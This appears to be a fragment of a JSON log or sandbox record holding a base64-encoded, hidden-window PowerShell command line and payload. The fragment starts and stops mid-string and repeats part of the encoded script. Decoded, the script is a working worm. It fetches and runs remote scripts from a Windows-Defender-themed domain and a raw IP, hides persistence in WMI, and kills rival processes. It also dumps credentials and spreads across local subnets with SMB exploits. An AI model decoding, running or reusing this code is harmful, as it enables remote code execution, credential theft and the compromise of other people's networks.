AB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD